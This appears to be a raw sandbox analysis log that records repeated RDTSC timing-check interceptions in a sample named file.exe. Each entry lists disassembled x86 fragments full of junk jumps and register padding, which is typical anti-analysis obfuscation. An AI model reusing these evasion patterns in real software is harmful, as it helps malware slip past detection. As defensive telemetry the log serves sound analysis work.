Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66EB29 second address: 66EB36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F40B477E786h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66EB36 second address: 66EB41 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007F40B515FBF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6706A0 second address: 6706BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnl 00007F40B477E786h 0x00000010 pushad 0x00000011 popad 0x00000012 jns 00007F40B477E786h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6706BF second address: 6706DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F40B515FC08h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 673082 second address: 673086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 673086 second address: 6730A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jmp 00007F40B515FC00h 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 673145 second address: 673149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 673149 second address: 673166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B515FC09h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6733E3 second address: 6733E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6733E9 second address: 6733ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6733ED second address: 6733F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6733F1 second address: 673403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 js 00007F40B515FBFEh 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6768D9 second address: 6768F3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 je 00007F40B477E786h 0x00000009 pop edx 0x0000000a jmp 00007F40B477E78Ah 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450387 second address: 5450399 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450399 second address: 545039F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 545039F second address: 54503A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54503A3 second address: 5450421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F40B477E78Ch 0x00000013 jmp 00007F40B477E795h 0x00000018 popfd 0x00000019 movzx eax, dx 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f jmp 00007F40B477E793h 0x00000024 mov edx, dword ptr [ebp+0Ch] 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F40B477E794h 0x0000002e add ax, 0178h 0x00000033 jmp 00007F40B477E78Bh 0x00000038 popfd 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450421 second address: 5450468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F40B515FC04h 0x0000000a sbb ecx, 35419BD8h 0x00000010 jmp 00007F40B515FBFBh 0x00000015 popfd 0x00000016 popad 0x00000017 popad 0x00000018 mov ecx, dword ptr [ebp+08h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F40B515FC05h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54803F0 second address: 548042F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E799h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F40B477E791h 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F40B477E78Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548042F second address: 5480493 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-04h] 0x0000000c pushad 0x0000000d mov dx, si 0x00000010 mov edi, ecx 0x00000012 popad 0x00000013 nop 0x00000014 jmp 00007F40B515FC02h 0x00000019 push eax 0x0000001a jmp 00007F40B515FBFBh 0x0000001f nop 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushfd 0x00000024 jmp 00007F40B515FC02h 0x00000029 xor ch, FFFFFFA8h 0x0000002c jmp 00007F40B515FBFBh 0x00000031 popfd 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480542 second address: 5480546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480546 second address: 548054C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548054C second address: 5480582 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007F40B477E794h 0x0000000b and ax, 9BB8h 0x00000010 jmp 00007F40B477E78Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov esi, eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480582 second address: 5480586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480586 second address: 548058C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54805E1 second address: 54805EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, C916h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54805EA second address: 548065B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, esi 0x00000009 pushad 0x0000000a mov si, di 0x0000000d pushfd 0x0000000e jmp 00007F40B477E795h 0x00000013 add ecx, 6E148A76h 0x00000019 jmp 00007F40B477E791h 0x0000001e popfd 0x0000001f popad 0x00000020 pop esi 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F40B477E78Ch 0x00000028 add esi, 1BF01F98h 0x0000002e jmp 00007F40B477E78Bh 0x00000033 popfd 0x00000034 mov dl, cl 0x00000036 popad 0x00000037 leave 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F40B477E78Eh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548065B second address: 547005D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 xor ebx, ebx 0x00000015 test al, 01h 0x00000017 jne 00007F40B515FBF7h 0x00000019 xor eax, eax 0x0000001b sub esp, 08h 0x0000001e mov dword ptr [esp], 00000000h 0x00000025 mov dword ptr [esp+04h], 00000000h 0x0000002d call 00007F40BA219033h 0x00000032 mov edi, edi 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F40B515FC03h 0x0000003b xor ecx, 6EAA7FAEh 0x00000041 jmp 00007F40B515FC09h 0x00000046 popfd 0x00000047 movzx ecx, bx 0x0000004a popad 0x0000004b push edx 0x0000004c jmp 00007F40B515FC08h 0x00000051 mov dword ptr [esp], ebp 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547005D second address: 5470061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470061 second address: 5470067 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470067 second address: 547006D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547006D second address: 5470092 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F40B515FC09h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470092 second address: 5470114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E791h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push FFFFFFFEh 0x0000000b pushad 0x0000000c push esi 0x0000000d pushfd 0x0000000e jmp 00007F40B477E793h 0x00000013 adc ah, FFFFFFDEh 0x00000016 jmp 00007F40B477E799h 0x0000001b popfd 0x0000001c pop eax 0x0000001d popad 0x0000001e push 0EE7BC56h 0x00000023 jmp 00007F40B477E798h 0x00000028 add dword ptr [esp], 66DEE1F2h 0x0000002f pushad 0x00000030 jmp 00007F40B477E78Eh 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470114 second address: 5470125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push 212B886Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470125 second address: 5470129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470129 second address: 547012F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547012F second address: 5470135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470135 second address: 5470139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470139 second address: 54701B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 5495A302h 0x0000000f jmp 00007F40B477E792h 0x00000014 mov eax, dword ptr fs:[00000000h] 0x0000001a jmp 00007F40B477E790h 0x0000001f nop 0x00000020 pushad 0x00000021 jmp 00007F40B477E78Eh 0x00000026 push esi 0x00000027 movsx ebx, ax 0x0000002a pop esi 0x0000002b popad 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushad 0x00000031 popad 0x00000032 pushfd 0x00000033 jmp 00007F40B477E78Bh 0x00000038 adc ch, 0000006Eh 0x0000003b jmp 00007F40B477E799h 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54701B6 second address: 54701F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F40B515FBFEh 0x0000000f sub esp, 18h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F40B515FC07h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54701F6 second address: 54702BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E799h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b push esi 0x0000000c mov bx, 163Eh 0x00000010 pop edi 0x00000011 jmp 00007F40B477E794h 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007F40B477E78Bh 0x0000001d xchg eax, ebx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F40B477E794h 0x00000025 and ax, 4268h 0x0000002a jmp 00007F40B477E78Bh 0x0000002f popfd 0x00000030 call 00007F40B477E798h 0x00000035 mov si, F961h 0x00000039 pop eax 0x0000003a popad 0x0000003b push ebx 0x0000003c pushad 0x0000003d push esi 0x0000003e mov al, dl 0x00000040 pop ecx 0x00000041 pushfd 0x00000042 jmp 00007F40B477E791h 0x00000047 adc ecx, 2B6125E6h 0x0000004d jmp 00007F40B477E791h 0x00000052 popfd 0x00000053 popad 0x00000054 mov dword ptr [esp], esi 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54702BC second address: 54702C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54702C0 second address: 54702C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54702C4 second address: 54702CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54702CA second address: 54702D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54702D0 second address: 54702D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54702D4 second address: 54702D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54702D8 second address: 5470300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F40B515FC05h 0x00000011 pop ecx 0x00000012 mov edx, 7C5E9E94h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470300 second address: 5470306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470306 second address: 547030A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547030A second address: 5470343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov esi, 1FFE8673h 0x0000000f popad 0x00000010 xchg eax, edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007F40B477E792h 0x0000001a or ecx, 4159C978h 0x00000020 jmp 00007F40B477E78Bh 0x00000025 popfd 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470343 second address: 54703C0 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 5C6228AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [75C74538h] 0x0000000f jmp 00007F40B515FC01h 0x00000014 xor dword ptr [ebp-08h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F40B515FC03h 0x00000020 adc esi, 0AA3F69Eh 0x00000026 jmp 00007F40B515FC09h 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007F40B515FC00h 0x00000032 xor ax, A898h 0x00000037 jmp 00007F40B515FBFBh 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54703C0 second address: 5470411 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov ebx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor eax, ebp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F40B477E794h 0x00000014 sbb cl, 00000028h 0x00000017 jmp 00007F40B477E78Bh 0x0000001c popfd 0x0000001d popad 0x0000001e nop 0x0000001f jmp 00007F40B477E796h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470411 second address: 547042D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547042D second address: 5470433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470433 second address: 547044E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a mov bx, 478Ah 0x0000000e movsx edx, ax 0x00000011 popad 0x00000012 lea eax, dword ptr [ebp-10h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547044E second address: 547045D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547045D second address: 5470475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B515FC04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470475 second address: 54704D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr fs:[00000000h], eax 0x00000011 jmp 00007F40B477E796h 0x00000016 mov dword ptr [ebp-18h], esp 0x00000019 jmp 00007F40B477E790h 0x0000001e mov eax, dword ptr fs:[00000018h] 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F40B477E797h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54704D4 second address: 547050D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [eax+00000FDCh] 0x0000000f jmp 00007F40B515FBFEh 0x00000014 test ecx, ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547050D second address: 5470511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470511 second address: 5470515 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470515 second address: 547051B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547051B second address: 5470520 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470520 second address: 5470526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470526 second address: 547053E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jns 00007F40B515FC64h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov dx, F96Ch 0x00000014 mov ax, dx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547053E second address: 54705F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F40B477E78Ch 0x00000009 sbb esi, 7D586F88h 0x0000000f jmp 00007F40B477E78Bh 0x00000014 popfd 0x00000015 mov di, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b add eax, ecx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F40B477E797h 0x00000024 and ax, 7C7Eh 0x00000029 jmp 00007F40B477E799h 0x0000002e popfd 0x0000002f popad 0x00000030 mov ecx, dword ptr [ebp+08h] 0x00000033 pushad 0x00000034 push esi 0x00000035 pushfd 0x00000036 jmp 00007F40B477E793h 0x0000003b sbb ah, FFFFFF8Eh 0x0000003e jmp 00007F40B477E799h 0x00000043 popfd 0x00000044 pop ecx 0x00000045 mov dx, 6B84h 0x00000049 popad 0x0000004a test ecx, ecx 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F40B477E796h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54705F7 second address: 54705FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54705FD second address: 5470601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546019A second address: 54601A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54601A0 second address: 546021D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E793h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F40B477E796h 0x00000011 push eax 0x00000012 pushad 0x00000013 call 00007F40B477E791h 0x00000018 mov bx, cx 0x0000001b pop esi 0x0000001c pushfd 0x0000001d jmp 00007F40B477E78Dh 0x00000022 xor si, 85C6h 0x00000027 jmp 00007F40B477E791h 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F40B477E78Dh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546021D second address: 5460223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460223 second address: 5460227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460227 second address: 5460295 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushad 0x0000000c call 00007F40B515FBFBh 0x00000011 pop ecx 0x00000012 mov cx, bx 0x00000015 popad 0x00000016 call 00007F40B515FC05h 0x0000001b pushfd 0x0000001c jmp 00007F40B515FC00h 0x00000021 and esi, 5C4FB328h 0x00000027 jmp 00007F40B515FBFBh 0x0000002c popfd 0x0000002d pop ecx 0x0000002e popad 0x0000002f sub esp, 2Ch 0x00000032 jmp 00007F40B515FBFFh 0x00000037 xchg eax, ebx 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460295 second address: 5460299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460361 second address: 5460365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460365 second address: 5460369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460369 second address: 546036F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546036F second address: 5460383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B477E790h 0x00000009 rdtsc
